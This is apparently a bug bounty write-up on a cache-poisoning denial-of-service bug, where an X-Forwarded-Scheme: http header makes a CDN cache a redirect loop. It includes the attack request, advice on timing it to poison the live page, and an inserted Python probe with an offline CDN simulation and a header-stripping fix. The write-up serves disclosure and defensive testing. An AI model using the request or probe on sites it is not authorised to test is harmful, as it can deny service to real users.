How I Made $16,500 Hacking CDN Caching Servers — Part 3

@bxmbn

bombon
InfoSec Write-ups


Cache Poisoning DoS Via X-Forwarded-Scheme Header

Bounty: $3,000

I didn’t know this was a thing until I saw @iustinBB’s blog about their research, Cache Poisoning at Scale.

Sending an x-forwarded-scheme: http header made the application respond with a 301 redirect to the same location: it treated the request as if it had arrived over plain HTTP and redirected to the HTTPS URL, which is exactly the URL that was just requested. If the CDN caches that response, everyone requesting the page receives a redirect to itself, a redirect loop that effectively denies access to the file.

I quickly remembered a private program’s asset that was behind caching servers and running Ruby on Rails.

Request:

GET /?xxx HTTP/2 
Host: Redacted
X-Forwarded-Scheme: http
...

If you test this, always use a “cache buster” (a unique query string such as ?anything=x). In this case I used ?xxx so I wouldn’t accidentally poison the cached response that other users receive.

Response:

HTTP/2 301 Moved Permanently 
Date: Wed, 19 Jan 2022 17:16:13 GMT
Content-Type: text/html
Location: Redacted
Via: 1.1 vegur
Cf-Cache-Status: HIT
Age: 3

If an attacker times the request to land just as the cached copy expires and poisons https://redacted/ itself (no cache buster),

The user’s response when requesting https://redacted/ will be

HTTP/2 301 Moved Permanently
Cf-Cache-Status: HIT

They won’t be able to access https://redacted/: the cached 301 points back to the same URL, so the browser follows it in a loop until the cache entry expires or is purged.
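The following is an added example, not code from the original write-up or from the program’s assets. It turns the test above into a reusable probe and pairs it with a constructed origin and CDN so the whole flow runs offline: the probe adds a cache buster, sends the poisoning request, then re-requests the same URL without the header to see what a normal user would get. The host redacted.example, the cb= buster parameter, and the RailsLikeOrigin / Cdn classes are assumptions for illustration; the origin stands in for an app that trusts X-Forwarded-Scheme, the CDN for a cache whose key is the URL alone. The strip_forwarded option shows the edge-side fix of dropping the client-supplied header before forwarding.

```python
"""Added example: probe for the X-Forwarded-Scheme cache-poisoning DoS safely, and
simulate an origin + CDN to show why the cache buster matters and where the fix goes."""
import secrets
from urllib.parse import urlsplit, urlunsplit


def add_cache_buster(url, token=None):
    """Append a unique query parameter so the test request never shares a cache key
    with the URL real users request (hypothetical parameter name 'cb')."""
    token = token or secrets.token_hex(4)
    parts = urlsplit(url)
    query = f"{parts.query}&cb={token}" if parts.query else f"cb={token}"
    return urlunsplit(parts._replace(query=query))


def _norm(url):
    """Normalise a URL for comparison: scheme, host, path and query."""
    p = urlsplit(url)
    return (p.scheme.lower(), p.netloc.lower(), p.path or "/", p.query)


def classify(requested_url, status, headers):
    """Classify the response a *clean* request (no poisoning header) gets back.
    'vulnerable'          : cached redirect whose Location is the requested URL itself (a loop)
    'redirect-not-cached' : same self-redirect, but served by the origin, so only the tester sees it
    'no-redirect'         : no redirect, or a redirect elsewhere (a normal http -> https hop)"""
    h = {k.lower(): v for k, v in headers.items()}
    if status not in (301, 302, 307, 308) or _norm(h.get("location", "")) != _norm(requested_url):
        return "no-redirect"
    cached = h.get("cf-cache-status", "").upper() == "HIT" or int(h.get("age", "0") or 0) > 0
    return "vulnerable" if cached else "redirect-not-cached"


def probe(send, url):
    """Poison a cache-busted copy of `url`, then re-request it without the header,
    exactly as a normal user would. `send(url, headers) -> (status, headers)`."""
    test_url = add_cache_buster(url)
    send(test_url, {"X-Forwarded-Scheme": "http"})   # attacker's request primes the cache
    status, headers = send(test_url, {})             # victim's request: what does the CDN serve?
    return classify(test_url, status, headers), test_url


class RailsLikeOrigin:
    """Constructed stand-in for an app that trusts X-Forwarded-Scheme to decide whether the
    client used TLS and 301s anything that looks like plain HTTP to the HTTPS URL."""
    def handle(self, url, headers):
        h = {k.lower(): v for k, v in headers.items()}
        scheme = h.get("x-forwarded-scheme", urlsplit(url).scheme)
        if scheme.lower() != "https":
            https_url = urlunsplit(urlsplit(url)._replace(scheme="https"))
            return 301, {"Location": https_url, "Content-Type": "text/html"}
        return 200, {"Content-Type": "text/html"}


class Cdn:
    """Constructed cache keyed on the full URL only: request headers such as
    X-Forwarded-Scheme are unkeyed, so one poisoned fill is served to everyone.
    With strip_forwarded=True the edge drops the client-supplied header before
    forwarding, which is the fix on the CDN side."""
    def __init__(self, origin, strip_forwarded=False):
        self.origin, self.strip_forwarded, self.store = origin, strip_forwarded, {}

    def send(self, url, headers=None):
        headers = dict(headers or {})
        if self.strip_forwarded:
            headers = {k: v for k, v in headers.items() if k.lower() != "x-forwarded-scheme"}
        if url in self.store:                        # cache key = URL; headers are ignored
            status, h = self.store[url]
            return status, {**h, "Cf-Cache-Status": "HIT", "Age": "3"}
        status, h = self.origin.handle(url, headers)
        self.store[url] = (status, h)
        return status, {**h, "Cf-Cache-Status": "MISS"}


if __name__ == "__main__":
    cdn = Cdn(RailsLikeOrigin())
    verdict, test_url = probe(cdn.send, "https://redacted.example/")
    print(verdict, test_url)                          # the busted URL loops; nobody else uses it
    print(cdn.send("https://redacted.example/")[0])   # the real page still serves 200
    cdn.store.clear()   # simulate the TTL expiring: the attacker must be first in after this
    cdn.send("https://redacted.example/", {"X-Forwarded-Scheme": "http"})
    print(cdn.send("https://redacted.example/"))      # every user now gets the cached 301 loop
    print(probe(Cdn(RailsLikeOrigin(), strip_forwarded=True).send, "https://redacted.example/")[0])
```

To run the probe against a live target you would replace Cdn.send with a function that performs the request with a real HTTP client and returns (status, headers); the classification logic is unchanged. Note that the attacker’s request only becomes the cached copy if it reaches the edge while no fresh entry exists, which is the timing the write-up refers to.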

Timeline:

Reported → January 19, 2022

Pending Program Review → January 25, 2022

Triaged → January 25, 2022

Bounty Awarded → January 26, 2022

The total for these three reports was $11,300.

I chose these three reports because they received the highest bounties.

I applied the same methodology to other programs, including web cache deception issues like #1343086,

making a total of $15,400 on HackerOne and $1,100 on BugCrowd.

Thanks for Reading!

Make sure to follow me on Twitter ;)

@bxmbn
